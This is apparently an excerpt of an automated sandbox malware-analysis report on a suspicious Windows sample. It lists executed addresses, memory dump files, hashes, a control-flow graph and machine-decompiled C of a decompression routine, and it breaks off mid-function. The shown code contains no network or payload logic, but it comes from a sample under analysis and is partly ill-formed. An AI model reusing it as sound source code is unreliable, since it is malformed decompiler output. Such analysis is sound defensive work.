                                                                                              0x00406ff7
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00407286
                                                                                              0x00407286
                                                                                              0x0040728a
                                                                                              0x004075b1
                                                                                              0x004075b1
                                                                                              0x00000000
                                                                                              0x004075b1
                                                                                              0x00407290
                                                                                              0x00407290
                                                                                              0x00407293
                                                                                              0x00407296
                                                                                              0x0040729a
                                                                                              0x0040729d
                                                                                              0x004072a3
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407056
                                                                                              0x00407056
                                                                                              0x00407059
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407395
                                                                                              0x00407395
                                                                                              0x00407399
                                                                                              0x004073bb
                                                                                              0x004073bb
                                                                                              0x004073be
                                                                                              0x004073c8
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x0040739b
                                                                                              0x0040739b
                                                                                              0x0040739e
                                                                                              0x004073a2
                                                                                              0x004073a5
                                                                                              0x004073a5
                                                                                              0x004073a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00407489
                                                                                              0x00407489
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x0040749d
                                                                                              0x00407458
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x0040744d
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717d
                                                                                              0x0040717f
                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x0040749d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725b
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00407447
                                                                                              0x004074c7
                                                                                              0x00407490

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                              • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                                              • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                              • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 749 407395-407399 750 4073bb-4073c8 749->750 751 40739b-40749d 749->751 753 4073cb-4073e0 750->753 761 4074c7-4074cb 751->761 754 4073e2-4073f8 753->754 755 4073fa-407410 753->755 757 407413-40741a 754->757 755->757 759 407441 757->759 760 40741c-407420 757->760 766 407447-40744d 759->766 764 407426-40743e 760->764 765 4075cf-4075d9 760->765 762 40752b-40753e 761->762 763 4074cd-4074ee 761->763 762->766 767 4074f0-407505 763->767 768 407507-40751a 763->768 764->759 769 4075e5-4075f8 765->769 771 406bf2 766->771 772 4075fa 766->772 773 40751d-407524 767->773 768->773 774 4075fd-407601 769->774 775 406bf9-406bfd 771->775 776 406d39-406d5a 771->776 777 406c9e-406ca2 771->777 778 406d0e-406d12 771->778 772->774 779 4074c4 773->779 780 407526 773->780 775->769 781 406c03-406c10 775->781 776->753 785 406ca8-406cc1 777->785 786 40754e-407558 777->786 782 406d18-406d2c 778->782 783 40755d-407567 778->783 779->761 787 4074a9-4074c1 780->787 788 4075db 780->788 781->772 789 406c16-406c5c 781->789 790 406d2f-406d37 782->790 783->769 791 406cc4-406cc8 785->791 786->769 787->779 788->769 792 406c84-406c86 789->792 793 406c5e-406c62 789->793 790->776 790->778 791->777 794 406cca-406cd0 791->794 799 406c94-406c9c 792->799 800 406c88-406c92 792->800 797 406c64-406c67 GlobalFree 793->797 798 406c6d-406c7b GlobalAlloc 793->798 795 406cd2-406cd9 794->795 796 406cfa-406d0c 794->796 801 406ce4-406cf4 GlobalAlloc 795->801 802 406cdb-406cde GlobalFree 795->802 796->790 797->798 798->772 803 406c81 798->803 799->791 800->799 800->800 801->772 801->796 802->801 803->792
                                                                                              C-Code - Quality: 98%
                                                                                              			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
